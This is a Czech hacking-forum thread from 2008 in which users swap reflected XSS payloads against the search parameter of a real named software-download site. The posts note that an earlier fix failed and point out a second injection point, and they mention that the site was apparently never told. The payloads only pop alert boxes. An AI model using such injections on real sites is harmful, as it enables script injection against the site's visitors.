Stahuj podruhe

HackForum

Stahuj podruhe#
jelikoz uz : www.stahuj.centrum.cz/?g[s]="<script>
alert('xss');</script>
opravili , tak jsem vrtal znovu.

www.stahuj.centrum.cz/?g[s]="</input>
<script>alert('XSS by Aton')</script>


(odpovědět)
Aton | Website26.1.2008 14:25
re: Stahuj podruhe#
hned vedle ...
[link]
(odpovědět)
hah | 85.160.24.*26.1.2008 15:18
re: Stahuj podruhe#
imho nic neopravili
www.stahuj.centrum.cz/?g[s]="<script>
alert("miranda")</script>
zobrazi se alert tolikrat, kolik bylo nalezeno vysledku (v tomto pripade 20x)... XSS se totiz nachazi v kazdem vysledku, a po kliku na urcity odkaz na program, ktery jste nalezli pomoci vyhledavani, se tyto data odeslou v GET promenne g[hledano] (asi z duvodu jakychsi statistik...),
dale se nachazi nekde v 67 radku v jakemsi skriptu, tudiz
www.stahuj.centrum.cz/?g[s]=</script>
<script>alert("XSS")</script>

----------
..:@]> [link] <[@:..
(odpovědět)
DjH | E-mail | Website | ICQ 319-960-89526.1.2008 15:25
re: Stahuj podruhe#
DjH: imho nic neopravili

A jestlipak jim o tom nekdo rekl ...
(odpovědět)
hah | 85.160.24.*26.1.2008 21:09
re: Stahuj podruhe#
imho nikdo nic nerekl :) bo ty jo?

----------
..:@]> [link] <[@:..
(odpovědět)
DjH | E-mail | Website | ICQ 319-960-89526.1.2008 21:22
re: Stahuj podruhe#
btw: wtf </input> ???!! nerikej mi ze ani HTML neumis, Atone :)

----------
..:@]> [link] <[@:..
(odpovědět)
DjH | E-mail | Website | ICQ 319-960-89526.1.2008 22:41
re: Stahuj podruhe#
no to je hrozne uzitecne... ;)
(odpovědět)
prc | 213.211.51.*27.1.2008 6:12

Zpět
 
 
 

 
BBCode